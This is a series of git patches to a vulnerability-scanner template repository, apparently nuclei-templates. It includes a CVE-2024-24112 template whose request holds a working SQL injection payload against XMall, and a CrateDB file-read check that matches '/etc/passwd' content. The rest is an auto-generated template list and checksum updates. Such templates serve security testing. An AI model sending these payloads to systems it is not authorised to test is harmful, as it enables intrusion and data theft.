a/http/cves/2024/CVE-2024-24112.yaml b/http/cves/2024/CVE-2024-24112.yaml index 86397ec9c4..fec098c74f 100644 --- a/http/cves/2024/CVE-2024-24112.yaml +++ b/http/cves/2024/CVE-2024-24112.yaml @@ -5,10 +5,10 @@ info: author: DhiyaneshDk severity: critical description: | - xmall v1.1 was discovered to contain a SQL injection vulnerability via the orderDir parameter. + XMall v1.1 was discovered to contain a SQL injection vulnerability via the 'orderDir' parameter. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2024-24112 - https://github.com/Exrick/xmall/issues/78 + - https://nvd.nist.gov/vuln/detail/CVE-2024-24112 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -33,8 +33,6 @@ http: - | GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,{{md5(num)}},0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D=&search%5Bregex%5D=false&cid=-1&_=1 HTTP/1.1 Host: {{Hostname}} - Accept: application/json, text/javascript, */*; q=0.01 - X-Requested-With: XMLHttpRequest matchers-condition: and matchers: From 1b0660c220edb481753b08e691bf720ba18d3715 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 19 Jun 2024 12:10:45 +0530 Subject: [PATCH 0395/1841] added regex --- http/cves/2024/CVE-2024-24565.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-24565.yaml b/http/cves/2024/CVE-2024-24565.yaml index 0b17006f94..8b778651ca 100644 --- a/http/cves/2024/CVE-2024-24565.yaml +++ b/http/cves/2024/CVE-2024-24565.yaml @@ -20,7 +20,7 @@ info: vendor: cratedb product: cratedb fofa-query: title="CrateDB" - tags: cve,cve2024,cratedb,lfi,info-leak,intrusive + tags: cve,cve2024,cratedb,lfi,exposure,intrusive variables: table_name: "{{to_lower(rand_text_alpha(8))}}" @@ -52,7 +52,7 @@ http: matchers: - type: dsl dsl: - - "status_code_1 == 200 && status_code_2 == 200 && status_code_3 == 200" - - "contains(body_3, 'root:')" + - regex('root:.*:0:0:', body_3) - "contains_all(header, 'application/json')" + - "status_code_1 == 200 && status_code_2 == 200 && status_code_3 == 200" condition: and From 7abd5cda18fa423dfb06bc270703f619b7338221 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 19 Jun 2024 06:44:30 +0000 Subject: [PATCH 0396/1841] Auto Generated New Template Addition List [Wed Jun 19 06:44:30 UTC 2024] :robot: --- .new-additions | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/.new-additions b/.new-additions index 2431224049..ac56c219b5 100644 --- a/.new-additions +++ b/.new-additions @@ -24,6 +24,7 @@ http/cves/2024/CVE-2024-31750.yaml http/cves/2024/CVE-2024-31982.yaml http/cves/2024/CVE-2024-32113.yaml http/cves/2024/CVE-2024-3274.yaml +http/cves/2024/CVE-2024-34982.yaml http/cves/2024/CVE-2024-36837.yaml http/cves/2024/CVE-2024-37393.yaml http/exposed-panels/lorex-panel.yaml @@ -34,6 +35,12 @@ http/exposed-panels/wildix-collaboration-panel.yaml http/misconfiguration/apache/apache-server-status-localhost.yaml http/misconfiguration/cookies-without-secure.yaml http/technologies/nperf-server-detect.yaml +http/technologies/wordpress/plugins/copy-delete-posts.yaml +http/technologies/wordpress/plugins/image-optimization.yaml +http/technologies/wordpress/plugins/royal-elementor-addons.yaml +http/technologies/wordpress/plugins/simple-history.yaml +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml http/vulnerabilities/gradio/gradio-lfi.yaml http/vulnerabilities/gradio/gradio-ssrf.yaml network/detection/mikrotik-ssh-detect.yaml From 5f8658e8f6251dec5bbc06298428e49e126cc571 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 19 Jun 2024 06:44:34 +0000 Subject: [PATCH 0397/1841] Auto Generated Templates Checksum [Wed Jun 19 06:44:34 UTC 2024] :robot: --- templates-checksum.txt | 729 +++++++++++++++++++++-------------------- 1 file changed, 368 insertions(+), 361 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8eac5d3a01..db03b1a031 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -189,8 +189,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:bb4672b4751b17c034799fabf7d52f0c8aed3302 -cves.json-checksum.txt:b10cb415f16dd74d75e70e696defacaf045d8c3e +cves.json:5df354979232e33156fcd31f6378019fa338c6f3 +cves.json-checksum.txt:8e59a06308786a4d94d3241e7e880816bdd9c1ff dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -630,221 +630,221 @@ helpers/wordlists/wordpress-plugins.txt:57232b538c5faddd4dd6e3adeb1864421764440d helpers/wordlists/wordpress-themes.txt:3424134fa69db08604545ecf1441cf6330bf0982 helpers/wordlists/wp-passwords.txt:dd36d46539d71aa9d1ecbdc83c7b74b931986d56 helpers/wordlists/wp-users.txt:b07f7f79b1d6ed1832e37e1d3feea3fd2bfb764b -helpers/wordpress/plugins/ad-inserter.txt:7d76a744d62fcb15b0d23310422874596cb2f9dd +helpers/wordpress/plugins/ad-inserter.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/add-to-any.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/admin-menu-editor.txt:8dc5253966cff788bc78a0da8c1ec52e0bee16a8 +helpers/wordpress/plugins/admin-menu-editor.txt:f84939ff21a1ffe63d6f3e405737228a6e174657 helpers/wordpress/plugins/adminimize.txt:ec155403800c88db49630516a63f68500f17d612 -helpers/wordpress/plugins/advanced-custom-fields.txt:b344dd80f5c5665d49ddd60ea99327f9ad56462f -helpers/wordpress/plugins/akismet.txt:e710dd44fa12f98194f8bba2bb20cba7bee18ff6 +helpers/wordpress/plugins/advanced-custom-fields.txt:f454be7d464d6c09f200806744a41ceb54f6bcfd +helpers/wordpress/plugins/akismet.txt:fb52ada446f84acb5529ace8fe4f25e203a5dddb helpers/wordpress/plugins/all-404-redirect-to-homepage.txt:e5d05199b7d43b0bd203a9cf2e8e874dad4ff45f -helpers/wordpress/plugins/all-in-one-seo-pack.txt:cf5d454cb0e2f3a4ab8decfa98d7abcd911aea35 -helpers/wordpress/plugins/all-in-one-wp-migration.txt:b071da3eacefc38f86d5c19f679acf81979dc01b -helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:720901cc15011491c5736a7c66be0da045ae177d -helpers/wordpress/plugins/amp.txt:2ca20d4461e9496d4ae27191e7273a12369ff17c -helpers/wordpress/plugins/antispam-bee.txt:bd5240b767bb950186835acb8bf1d4cb794a5706 -helpers/wordpress/plugins/astra-sites.txt:bd39c9219dc62ab101d18a96b5b110c98c101942 +helpers/wordpress/plugins/all-in-one-seo-pack.txt:fe43108f583e1215970ae2e88527d0fbd89b7f58 +helpers/wordpress/plugins/all-in-one-wp-migration.txt:41d75a1151922be816d326fae3463dc4a05124b0 +helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:713afc477e35aa343e8d0dd831aa85fab6ba2e0f +helpers/wordpress/plugins/amp.txt:c955a071223dbc4ae3893b0d1dc4db00dd77d91f +helpers/wordpress/plugins/antispam-bee.txt:ce256ecfbb665c5366c1669a3e7c3a24c65a6fa2 +helpers/wordpress/plugins/astra-sites.txt:97d362c1e174c59583bc075f9c4f790b095f0935 helpers/wordpress/plugins/astra-widgets.txt:386ef6797a9c4de50f240b16bd76bbeae35a5711 -helpers/wordpress/plugins/autoptimize.txt:4be1dfbb67ef8087f7232dac0ed90c2603a22047 -helpers/wordpress/plugins/backwpup.txt:9aee6cd1d30e7074fb9f3f696e3ee4149b9fe6f2 +helpers/wordpress/plugins/autoptimize.txt:1889abba77b26fc1827431e5d46978a5e89769e6 +helpers/wordpress/plugins/backwpup.txt:66eed0a7a5e1364c307f42f580a7ff24e731f1a0 helpers/wordpress/plugins/better-search-replace.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/better-wp-security.txt:0ab93e6d4bb33d2402c76b813b0e73b382d10bf0 +helpers/wordpress/plugins/better-wp-security.txt:f954f92b164d31ac62328698a1fa3f9b20d5ccc2 helpers/wordpress/plugins/black-studio-tinymce-widget.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53 -helpers/wordpress/plugins/breadcrumb-navxt.txt:3eebc7c9c53af6e2c8a91094b656f824a4b7150b -helpers/wordpress/plugins/breeze.txt:62ae0a0bab42c04287348792d7a13bd6f8de179b -helpers/wordpress/plugins/broken-link-checker.txt:f243f3446bb1226eacba3cdb8b904ef729d6ec9d -helpers/wordpress/plugins/child-theme-configurator.txt:cd33f7fb7f78c2a8e69fb30b7a69764612452320 +helpers/wordpress/plugins/breadcrumb-navxt.txt:8470da5c818e6dc68d623fea21c1b507e075b906 +helpers/wordpress/plugins/breeze.txt:12c708130d75c9e7150d0af82c0b82b66c6c85e0 +helpers/wordpress/plugins/broken-link-checker.txt:47ac56ccfa5b6db61c32cb48c2dda8cc64d242cb +helpers/wordpress/plugins/child-theme-configurator.txt:fbd969c78e9a6d04b7b8fc3a74ee2ee96b5fb3d8 helpers/wordpress/plugins/classic-editor.txt:933c3d96b7fbc319e2e08dda5c340797d7c8d99f helpers/wordpress/plugins/classic-widgets.txt:98250286db92ccc336dc6f622c10c8bc09286693 -helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt:2ff4d559ec8edac6e2507529c3847230532f6481 +helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt:83883f9a9f04a04af0c790df93d414e14826cfb7 helpers/wordpress/plugins/cloudflare.txt:95b4f085ec6b3a33a23781c7cfda78c317e5dca1 -helpers/wordpress/plugins/cmb2.txt:12291cb9150686dd1175c2a1662b9d1acd8b9b62 -helpers/wordpress/plugins/coblocks.txt:d1fd48333115227b181b4b132e5511e91d95bea5 -helpers/wordpress/plugins/code-snippets.txt:cc1586242918f22469f32e7d30bae9a88f411c48 +helpers/wordpress/plugins/cmb2.txt:6f2af731f80db655385d3795034b4b4bdd02a8bf +helpers/wordpress/plugins/coblocks.txt:1889abba77b26fc1827431e5d46978a5e89769e6 +helpers/wordpress/plugins/code-snippets.txt:bcfacf8cd6cd2afbf752b95fba64c2c67f0c2e7b helpers/wordpress/plugins/coming-soon.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/complianz-gdpr.txt:b5561cfef6a347c3e3855f0fe90a7ffc89bba645 +helpers/wordpress/plugins/complianz-gdpr.txt:47c3ed69e5609d2452fff4d1fa775f2f0aaa7d4c helpers/wordpress/plugins/contact-form-7-honeypot.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf -helpers/wordpress/plugins/contact-form-7.txt:98c2fe41f97d12ffb6f8362363d6352e0a8a03d9 -helpers/wordpress/plugins/contact-form-cfdb7.txt:c6802dfc6ada46af8820db93c237d00787bd441c -helpers/wordpress/plugins/cookie-law-info.txt:e533a0ddf49ac25eb565f7786d75249e411bd53a -helpers/wordpress/plugins/cookie-notice.txt:304859cac07df365e8ae2d3ed6bd158be4871773 +helpers/wordpress/plugins/contact-form-7.txt:2cb2c87ac5ebde3b1ed1d5d55a5747b6f05ee8f7 +helpers/wordpress/plugins/contact-form-cfdb7.txt:87d8ffba80ba87401ae94d97363f39c9ca8aa639 +helpers/wordpress/plugins/cookie-law-info.txt:bfab3aeb3ee470933c959fbaefb61840492ea8f8 +helpers/wordpress/plugins/cookie-notice.txt:5b3fa59c8d983303bb4380265de5153b897ee87d helpers/wordpress/plugins/creame-whatsapp-me.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/creative-mail-by-constant-contact.txt:5c09cf3589e93781df4d59ed6b5a5d6207e2929c -helpers/wordpress/plugins/custom-css-js.txt:8dc5c19bd2e2fc98164a4a36175f72d2b1b3b2a3 -helpers/wordpress/plugins/custom-fonts.txt:d24fa45ca77f079cc359c97272276969e6aead2c -helpers/wordpress/plugins/custom-post-type-ui.txt:c26817acfeb148d7e6ba9954963e981948a2db3f -helpers/wordpress/plugins/disable-comments.txt:885717c949656aacb397735714a117bba20af139 -helpers/wordpress/plugins/disable-gutenberg.txt:916a3b37862d25c71eb7293f7b653e91636f92a7 +helpers/wordpress/plugins/creative-mail-by-constant-contact.txt:8a49e162e780f4c3a1d7e6f60cbfde4d5158004e +helpers/wordpress/plugins/custom-css-js.txt:4ef690b935393e44a136931421e45fe50451b469 +helpers/wordpress/plugins/custom-fonts.txt:c7e3a41454e034e5ad994df8bf12b61e9fb1e1bc +helpers/wordpress/plugins/custom-post-type-ui.txt:fcb074a94f4c6b8f87287f31608426312e7fb753 +helpers/wordpress/plugins/disable-comments.txt:2ae3ad2f93cb6bc93d15eedb93cdf5051262687b +helpers/wordpress/plugins/disable-gutenberg.txt:8b06ddb10d32fd00c6f396f4696592af976b2118 helpers/wordpress/plugins/duplicate-page.txt:eb8938636fe209df72afeee0da7ccac88ff1f5b9 helpers/wordpress/plugins/duplicate-post.txt:59a7597c10f2e831aaf8a6526fb9a13e25ea680e -helpers/wordpress/plugins/duplicator.txt:170bdbb9ae37509c84fa4b2ac0bc4aeac0e4080a -helpers/wordpress/plugins/duracelltomi-google-tag-manager.txt:c70da539b9e83a50bb70013e6a5cb6e9d4623d5c +helpers/wordpress/plugins/duplicator.txt:157d57f2e8bde3f7ab25703a4e4a74dc578bd412 +helpers/wordpress/plugins/duracelltomi-google-tag-manager.txt:68c9b7f7107e58a492677237912410e7d28c994b helpers/wordpress/plugins/easy-fancybox.txt:fa2d8a9d18d35e9aa274b6d7d0ad0225d0362ed6 helpers/wordpress/plugins/easy-google-fonts.txt:775bbc46d0bc85e121db86ae12b2993ffedbb0ae helpers/wordpress/plugins/easy-table-of-contents.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/easy-wp-smtp.txt:595d550379b2cb8bccb9659627308ff4e751d23f -helpers/wordpress/plugins/elementor.txt:356d6571e41e7ca40bd834a3856e56fd1db23de9 -helpers/wordpress/plugins/elementskit-lite.txt:2eb538e42b910c397ab801353b059c51f265f092 -helpers/wordpress/plugins/enable-media-replace.txt:9301d028023f0b8d0d7bac4531bbd63703d358da -helpers/wordpress/plugins/envato-elements.txt:fefed34c88a4926b37d965db8c15fed2727796a6 -helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:9ea990cdc04de03985119ec4c7b120cccd122e1d -helpers/wordpress/plugins/ewww-image-optimizer.txt:f0e80e9d8b6e35e4d07b971ea614c40d8ec4efa3 -helpers/wordpress/plugins/facebook-for-woocommerce.txt:67de27fd6cf8d4bc1ad0b22499ec7f87a1acf6c4 -helpers/wordpress/plugins/fast-indexing-api.txt:7fc90060ab7493dc709f0e0cbc6ae3ca7204a614 +helpers/wordpress/plugins/easy-wp-smtp.txt:01b1c534c2db2eebe8eb41bca1f0ffc4193b0e3f +helpers/wordpress/plugins/elementor.txt:2b0e38d303e042a2d07cda096a0cdeb1c652e196 +helpers/wordpress/plugins/elementskit-lite.txt:b981b5efd3a591e7a7cda1a4740574ce3b34b19a +helpers/wordpress/plugins/enable-media-replace.txt:02c0165b5afcee9880bd9f9df6fd96ec80b231d4 +helpers/wordpress/plugins/envato-elements.txt:56edf1b708bdabe845695022e07cf4185f4dcad7 +helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:c2f6e33fb60b67b268545d3b0e259764776a283d +helpers/wordpress/plugins/ewww-image-optimizer.txt:870e5d450f9b724470527fe121b78fd6bbf6d9aa +helpers/wordpress/plugins/facebook-for-woocommerce.txt:bfab3aeb3ee470933c959fbaefb61840492ea8f8 +helpers/wordpress/plugins/fast-indexing-api.txt:9179d5509f8564f9a9b7411a76b338ec2a3b721c helpers/wordpress/plugins/favicon-by-realfavicongenerator.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/flamingo.txt:98a16af997b52cb888232ab5d79a527b0716561c -helpers/wordpress/plugins/fluentform.txt:2bc8efc9293c4b3728040c0fa0aaeead60f3e7cd -helpers/wordpress/plugins/font-awesome.txt:4cb6b226aa8498265c8ea84adcf05e5e168e17c1 -helpers/wordpress/plugins/force-regenerate-thumbnails.txt:5b7155a36d36681935655d772bbc981bc2393fa3 -helpers/wordpress/plugins/formidable.txt:aa11d0c1b683ff91b10b12c27c193d1c0e3e79bd -helpers/wordpress/plugins/forminator.txt:7ab2353beecc20bd48d3f18f6a7a3017284f0a33 -helpers/wordpress/plugins/ga-google-analytics.txt:3461f14dcf5ad31d1e3bb55dc76e5c9a4dc3a33a -helpers/wordpress/plugins/gdpr-cookie-compliance.txt:661db2b567abfae32bdeff737745e6a1b19a9b66 -helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:930b897c8f462f3481417439767aee0a0351da4e -helpers/wordpress/plugins/google-analytics-for-wordpress.txt:71f2326d81498f3c97156fd83f18327adc5f33e0 -helpers/wordpress/plugins/google-listings-and-ads.txt:a2f11ac8b113b4b1364c402fb6573a352f77c478 -helpers/wordpress/plugins/google-site-kit.txt:31d00f51d06c2f2bf8305caa71c2473823d2d018 -helpers/wordpress/plugins/google-sitemap-generator.txt:05a4815f734948e3bc0149a6d2d11169a1825f61 -helpers/wordpress/plugins/gtranslate.txt:9d58b49dc32ab6a8591bb2ce2c9a3a4748e7f41d -helpers/wordpress/plugins/gutenberg.txt:d112c7866fd2e3350329585eb2a59d42c833ccae -helpers/wordpress/plugins/happy-elementor-addons.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf +helpers/wordpress/plugins/flamingo.txt:555a5c5c92b230dccab828d90e89ec66847ab9ce +helpers/wordpress/plugins/fluentform.txt:62816587b37c8a986e8470456cb1ccaca418bd38 +helpers/wordpress/plugins/font-awesome.txt:24081282f3a9a62c341308c388d8ed137057665d +helpers/wordpress/plugins/force-regenerate-thumbnails.txt:8bff12eeb621c3f4c18ae1d2809b3860778910f4 +helpers/wordpress/plugins/formidable.txt:885561af27d408d763c9217b9871abd3eea4f4a8 +helpers/wordpress/plugins/forminator.txt:4069b806e5d27e95685e8ab99e1322abd02eb9d4 +helpers/wordpress/plugins/ga-google-analytics.txt:685772c638221af0e5cd971e0621df348dbadc35 +helpers/wordpress/plugins/gdpr-cookie-compliance.txt:2f4af87dfd67a2385a4e30cfbd4d57d669853135 +helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:bc9981e1c7ebf53d15d8cf9698c2bb6137881fc9 +helpers/wordpress/plugins/google-analytics-for-wordpress.txt:ba46cbfd15f3e265cd93b9b01e7e97a6fbfa3a14 +helpers/wordpress/plugins/google-listings-and-ads.txt:c3c414dd549c09cb265d8cf95aef8445bf875384 +helpers/wordpress/plugins/google-site-kit.txt:7697e2f00724b53c7cbc549f326edd9398a72802 +helpers/wordpress/plugins/google-sitemap-generator.txt:5b10aa0446ed4db0d92e61d502b9ac9a6d6563e7 +helpers/wordpress/plugins/gtranslate.txt:16b08d6d2a65aa308add14852e0faea08001ef60 +helpers/wordpress/plugins/gutenberg.txt:d2fcc8823f1ab00267761e1899524f6acaf1c6ae +helpers/wordpress/plugins/happy-elementor-addons.txt:8365908e3026803300d1009572fe7bf474d0927b helpers/wordpress/plugins/header-and-footer-scripts.txt:bf64dd8c92190417a38d834b0c92eee4be757761 -helpers/wordpress/plugins/header-footer-code-manager.txt:1653860f5bc7d2d43d6254c11488c4469d9db444 -helpers/wordpress/plugins/header-footer-elementor.txt:e6657339eaafc90d6f3c5a594663474defe7535f -helpers/wordpress/plugins/header-footer.txt:237c8767860dc44f0f30057d25e9143e3d0b425f +helpers/wordpress/plugins/header-footer-code-manager.txt:42c9dca141f2cd50ab7fcfa673255d29eac1fe9d +helpers/wordpress/plugins/header-footer-elementor.txt:e1e19bc7267dd9c0a93903ac4803a7f52de3d1d6 +helpers/wordpress/plugins/header-footer.txt:e533118608a55d6ab1d3699c600fc5c59213df36 helpers/wordpress/plugins/health-check.txt:9b80ca131fbc6cb5a944359bf46b2f5f301b25fc helpers/wordpress/plugins/hello-dolly.txt:534467bb06aa6d8cb7e27ce2f48b87742c795cad -helpers/wordpress/plugins/host-webfonts-local.txt:dfd2d99b548aa82005fc9d0caa10f67fd49dd9d0 -helpers/wordpress/plugins/hostinger.txt:b600bf3dacb5d620338f6412a343d3349ec570bf -helpers/wordpress/plugins/imagify.txt:5b7155a36d36681935655d772bbc981bc2393fa3 -helpers/wordpress/plugins/imsanity.txt:127ff004f8eef50a85abd75d168e497de8d9a88d -helpers/wordpress/plugins/insert-headers-and-footers.txt:c7e3a41454e034e5ad994df8bf12b61e9fb1e1bc +helpers/wordpress/plugins/host-webfonts-local.txt:e00602f1c349065df0c9ef24dec6d03c9f5a1ecf +helpers/wordpress/plugins/hostinger.txt:6dd1f25f2a4f5c9c73793bed06929318969169c0 +helpers/wordpress/plugins/imagify.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0 +helpers/wordpress/plugins/imsanity.txt:6b6e01beb45fb7f89787efd83e89589ecafc6104 +helpers/wordpress/plugins/insert-headers-and-footers.txt:1467c965873cc632279bc3b451f12414b23902fc helpers/wordpress/plugins/instagram-feed.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/intuitive-custom-post-order.txt:2aa887540d97ffa062fa8604e7ecde642f7080e6 -helpers/wordpress/plugins/iwp-client.txt:9f028fa080dca632a19e807c2a3570f67ae71de3 -helpers/wordpress/plugins/jetpack-boost.txt:595d550379b2cb8bccb9659627308ff4e751d23f -helpers/wordpress/plugins/jetpack.txt:2a9cdeb8bcdb15259d0fafd7169dff1ca297d4e3 -helpers/wordpress/plugins/kadence-blocks.txt:a9f5295f892040af50799d52ffe673c30f915d48 -helpers/wordpress/plugins/kirki.txt:5d8c63c6b430d2d7a19d0713fe2378eab9b1edfa -helpers/wordpress/plugins/leadin.txt:60620153157bc5e0f5694a53d4ad22522db276aa -helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:ebc71869ccc22bf69e203d41bafb4b7d5ec66d29 +helpers/wordpress/plugins/intuitive-custom-post-order.txt:d1fd48333115227b181b4b132e5511e91d95bea5 +helpers/wordpress/plugins/iwp-client.txt:6c3371737e84ab4219f83867466569f042741c0c +helpers/wordpress/plugins/jetpack-boost.txt:d8521792e123691f48a1df559885c477069c6c1d +helpers/wordpress/plugins/jetpack.txt:a861c6358fded34510ab1962eb66230220d77942 +helpers/wordpress/plugins/kadence-blocks.txt:45effb36b85fab8162ce999d16a2e5e6a286f313 +helpers/wordpress/plugins/kirki.txt:9640fdbbae3c8e8f74e96e656f485284e8f8ed9d +helpers/wordpress/plugins/leadin.txt:d4a4068d21627778d982b009ccde0601fc6647b8 +helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:43ddb1cda513914337740779bb2bfd8d0026778c helpers/wordpress/plugins/limit-login-attempts.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/litespeed-cache.txt:76bfe435359baea4a37124005ae50b88a655f8eb -helpers/wordpress/plugins/loco-translate.txt:fbd969c78e9a6d04b7b8fc3a74ee2ee96b5fb3d8 -helpers/wordpress/plugins/loginizer.txt:d176141136f1fe969aeca56eb98e3734f24199ae +helpers/wordpress/plugins/litespeed-cache.txt:3a108f8e498bd0c9790af41f7f7d8093515044ff +helpers/wordpress/plugins/loco-translate.txt:0aa5278ef5ea1dbf030f22ea213474a6ac406d64 +helpers/wordpress/plugins/loginizer.txt:cd50e5150f44bd97a823ab2dd4155dd014f5f646 helpers/wordpress/plugins/loginpress.txt:4ea93c6a1e320054f99d66f428e611b31355cd92 helpers/wordpress/plugins/mailchimp-for-woocommerce.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/mailchimp-for-wp.txt:186e14d6aab75036a772d1fb5c52730edbd81325 -helpers/wordpress/plugins/mailpoet.txt:75e0500529195f211e6a6d1d3282aee001942b1d -helpers/wordpress/plugins/maintenance.txt:676c72a3610df638213dbd14937d1a1d3541b924 -helpers/wordpress/plugins/mainwp-child.txt:eb8938636fe209df72afeee0da7ccac88ff1f5b9 -helpers/wordpress/plugins/malcare-security.txt:141b2886bf5ec123af5b3422481602a3265cfc98 -helpers/wordpress/plugins/megamenu.txt:bfab3aeb3ee470933c959fbaefb61840492ea8f8 -helpers/wordpress/plugins/members.txt:e533118608a55d6ab1d3699c600fc5c59213df36 -helpers/wordpress/plugins/meta-box.txt:e00602f1c349065df0c9ef24dec6d03c9f5a1ecf -helpers/wordpress/plugins/metform.txt:95f4583e327a11aaa1ea09292b7411fda3205655 -helpers/wordpress/plugins/ml-slider.txt:a49d0c268662bbe726ad8c2b97f3c94d166eeafe -helpers/wordpress/plugins/newsletter.txt:32737ef20b15ae007d4ac5d4b0fea9065e071dbf -helpers/wordpress/plugins/nextend-facebook-connect.txt:1889abba77b26fc1827431e5d46978a5e89769e6 -helpers/wordpress/plugins/nextgen-gallery.txt:9ba3ba859fda4b27ead81d8ddbeb1cd132e92901 -helpers/wordpress/plugins/ninja-forms.txt:decfe4a741808ff162a3556af7bda411d3d2454a -helpers/wordpress/plugins/ocean-extra.txt:f243f3446bb1226eacba3cdb8b904ef729d6ec9d -helpers/wordpress/plugins/official-facebook-pixel.txt:5eb70ea432dbf15369ae7e9b68ba24eb17818ce9 -helpers/wordpress/plugins/one-click-demo-import.txt:b981b5efd3a591e7a7cda1a4740574ce3b34b19a -helpers/wordpress/plugins/optinmonster.txt:6ef3be477b8824232190042773457096eeff911b +helpers/wordpress/plugins/mailchimp-for-wp.txt:0ef6ca3504757e440dbb7f74dfc7956540130d09 +helpers/wordpress/plugins/mailpoet.txt:ad3aa02dac0a1de91cab5427e583e6630dbfef45 +helpers/wordpress/plugins/maintenance.txt:2a43381575a9307e0a57dabb66f98b0c79dfa944 +helpers/wordpress/plugins/mainwp-child.txt:6746a82081d852d58b152584407d5b80d3ac43f3 +helpers/wordpress/plugins/malcare-security.txt:ba9db54a3e9b0df9d1362a546f3b3e62f1aa032c +helpers/wordpress/plugins/megamenu.txt:054dae9d64c38d76a066c981fbdab975b1abbf53 +helpers/wordpress/plugins/members.txt:2beef4f1a38f9db1c05a1e49977c956626624d66 +helpers/wordpress/plugins/meta-box.txt:df805429f6823d1d7321bcb6d64c21695e3fa92e +helpers/wordpress/plugins/metform.txt:714503a3af828a0db664fd44681d548aba3ee3a7 +helpers/wordpress/plugins/ml-slider.txt:80ed6599146b54137db225fcbb582290d8512149 +helpers/wordpress/plugins/newsletter.txt:d65b7f11924aba386b754c66ffada0aae0642b22 +helpers/wordpress/plugins/nextend-facebook-connect.txt:f6eab21f4096ab86124a60f5d8ae48626e598de9 +helpers/wordpress/plugins/nextgen-gallery.txt:8c695bf155c8053505aaa583b04fbde1a8491860 +helpers/wordpress/plugins/ninja-forms.txt:a16cd18f1019f04b207109b189b504edbde41ab2 +helpers/wordpress/plugins/ocean-extra.txt:18e9f01467bf3568b107a667570d1dd8c6440565 +helpers/wordpress/plugins/official-facebook-pixel.txt:49f9230a0175e58b6964e60aa97809134e03c8ae +helpers/wordpress/plugins/one-click-demo-import.txt:998d4ef3e7a6039ddbf0f888a2fd1c5243f7318b +helpers/wordpress/plugins/optinmonster.txt:7d8b5404caa565138684fd608724173bbe20f2c6 helpers/wordpress/plugins/otter-blocks.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf -helpers/wordpress/plugins/password-protected.txt:b4330c10b1930a962d4aa85655b55a57dbd7328e -helpers/wordpress/plugins/pdf-embedder.txt:fe43108f583e1215970ae2e88527d0fbd89b7f58 +helpers/wordpress/plugins/password-protected.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53 +helpers/wordpress/plugins/pdf-embedder.txt:7c48bf349bc02741cd6e5bf188ef8ecd52f2a60c helpers/wordpress/plugins/photo-gallery.txt:118daf97168a9a15434efdbbaa6d2dbe5614eec6 helpers/wordpress/plugins/php-compatibility-checker.txt:c117423da3e5e169d36e3111880b709d28e85308 -helpers/wordpress/plugins/pinterest-for-woocommerce.txt:8326bd0ec47bc0909e7de21090a01d479ab07635 -helpers/wordpress/plugins/pixelyoursite.txt:6a23c5e874cf7ddbc3b1d408f091cd4482213a43 -helpers/wordpress/plugins/polylang.txt:4464e9f2e5e0cf52e9c26d3864e71249d73ea33a +helpers/wordpress/plugins/pinterest-for-woocommerce.txt:024e6d4f5d6db7d7e0b074cb50b41ad492ddb8c3 +helpers/wordpress/plugins/pixelyoursite.txt:7484f12819849725f45fc1539fd2128bde3834ee +helpers/wordpress/plugins/polylang.txt:634ac7a7e33e6dc123884fef23157c442970fb87 helpers/wordpress/plugins/popup-builder.txt:8b367cc24dc19d310f9af1157021067beef77465 -helpers/wordpress/plugins/popup-maker.txt:2b3c6ac23cfffce2c714f7553284e912852ab2fe -helpers/wordpress/plugins/post-smtp.txt:52f08dc0ec7447b979e5b5496491f05e73eadfd9 